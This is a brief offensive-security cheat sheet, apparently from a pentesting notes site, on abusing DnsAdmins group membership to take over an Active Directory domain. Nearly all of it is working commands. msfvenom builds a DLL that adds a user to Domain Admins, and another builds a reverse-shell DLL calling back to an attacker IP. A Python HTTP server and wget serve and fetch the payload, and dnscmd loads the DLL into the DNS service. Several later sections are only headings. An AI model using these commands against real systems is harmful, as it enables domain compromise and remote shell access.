Leveraging DnsAdmins Access

Recursos


Tools


msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
# Or reverse shell
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f dll > reverse.dll
python3 -m http.server <PORT>
wget "http://<ATTACKER-IP>:<PORT>/adduser.dll" -outfile "adduser.dll"
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
Get-ADGroupMember -Identity DnsAdmins
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

Cleaning Up


Using Mimilib.dll

Modificar kdns.carrow-up-right


Creating a WPAD Record

Last updated